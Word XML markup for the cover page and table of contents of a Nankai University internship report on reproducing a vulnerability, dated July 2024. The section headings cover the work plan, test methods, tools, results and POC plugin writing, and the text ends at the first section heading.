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18DEC1" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F26692E" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F9DE61A" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37912580" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56585FDD" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>南开大学</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17627C40" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>实习实训漏洞复现报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38456A5C" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0E0D5C" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68235644" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EB1525C" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63B15D39" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="265250B0" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EEE48E1" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="566EAA84" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E906E6E" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35E9620E" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="556382BC" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="659B435B" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1073EAD4" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A0488A7" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AFB4D01" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05C5ED25" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15274663" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EC4024F" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="609948F8" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73913BBD" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25ADC636" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1699C589" w14:textId="481CD6D5" w:rsidR="00C60920" w:rsidRDefault="00000000" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>02</w:t>
      </w:r>
      <w:r w:rsidR="00AB3661">
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r w:rsidR="00AB3661">
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r w:rsidR="00AB3661">
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243BC9ED" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:id w:val="147463564"/>
        <w15:color w:val="DBDBDB"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="24BE4292" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000" w:rsidP="00854BD6">
          <w:pPr>
            <w:spacing w:line="276" w:lineRule="auto"/>
            <w:jc w:val="center"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              <w:sz w:val="21"/>
            </w:rPr>
            <w:t>目录</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7E12899E" w14:textId="585F09F1" w:rsidR="006D43B9" w:rsidRDefault="00000000" w:rsidP="00854BD6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1"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
              <w:bCs/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
              <w:bCs/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:instrText xml:space="preserve">TOC \o "1-3" \h \u </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
              <w:bCs/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc172983141" w:history="1">
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>漏洞复现结论（</w:t>
            </w:r>
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>分）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1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28366903" w14:textId="5269B2DB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42" w:history="1">
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1</w:t>
            </w:r>
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>风险等级分布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2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4A67603F" w14:textId="1251F831" w:rsidR="006D43B9" w:rsidRDefault="00000000" w:rsidP="00854BD6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1"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc172983143" w:history="1">
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>工作计划（</w:t>
            </w:r>
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>分）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3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7AE427A7" w14:textId="323F4EBF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44" w:history="1">
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1</w:t>
            </w:r>
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>工作人员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4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1DD2188C" w14:textId="539BDA6C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45" w:history="1">
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2</w:t>
            </w:r>
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>漏洞对象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5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2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20047579" w14:textId="50ABC421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46" w:history="1">
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3</w:t>
            </w:r>
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>漏洞复现阶段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6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2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661B68CA" w14:textId="457F7C3E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47" w:history="1">
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.4</w:t>
            </w:r>
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>风险等级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7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2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448FF250" w14:textId="2F9AB143" w:rsidR="006D43B9" w:rsidRDefault="00000000" w:rsidP="00854BD6">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs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1"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc172983148" w:history="1">
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>漏洞复现过程（</w:t>
            </w:r>
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>分）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8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2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614FB43D" w14:textId="3D2388B6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49" w:history="1">
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">3.1 </w:t>
            </w:r>
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>风险管理及规避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49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9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49C26572" w14:textId="3B9085AD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50" w:history="1">
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2</w:t>
            </w:r>
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>测试方法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50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0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41BAA5B9" w14:textId="43DEB332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51" w:history="1">
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3</w:t>
            </w:r>
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>测试中所用的工具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51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0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307485D8" w14:textId="0E106652" w:rsidR="006D43B9" w:rsidRDefault="00000000" w:rsidP="00854BD6">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="420"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8296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noProof/>
              <w:sz w:val="21"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc172983152" w:history="1">
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
            <w:r w:rsidR="006D43B9"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14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>漏洞复现结果（</w:t>
            </w:r>
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>分）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52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0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013F8EEE" w14:textId="504A137E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53" w:history="1">
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1 POC</w:t>
            </w:r>
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>插件编写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53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0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7E5B03AB" w14:textId="1447F945" w:rsidR="006D43B9" w:rsidRDefault="00000000" w:rsidP="00854BD6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:spacing w:line="276" w:lineRule="auto"/>
            <w:ind w:left="480"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="21"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc172983154" w:history="1">
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">4.2 </w:t>
            </w:r>
            <w:r w:rsidR="006D43B9" w:rsidRPr="001B109A">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>漏洞信息</w:t>
            </w:r>
            <w:r w:rsidR="006D43B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006D43B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/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noProof/>
              </w:rPr>
              <w:instrText>PAGEREF _Toc172983154 \h</w:instrText>
            </w:r>
            <w:r w:rsidR="006D43B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> </w:instrText>
            </w:r>
            <w:r w:rsidR="006D43B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006D43B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006D43B9">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="006D43B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C9D5996" w14:textId="04A8B4B5" w:rsidR="00C60920" w:rsidRDefault="00000000" w:rsidP="00854BD6">
          <w:pPr>
            <w:spacing w:line="276" w:lineRule="auto"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="2B829ACC" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C794CA4" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="647E02D2" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156" w:line="276" w:lineRule="auto"/>
        <w:sectPr w:rsidR="00C60920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3F2AEC" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="312" w:after="312" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc14593"/>
      <w:bookmarkStart w:id="1" w:name="_Toc32228"/>
      <w:bookmarkStart w:id="2" w:name="_Toc172983141"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现结论</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
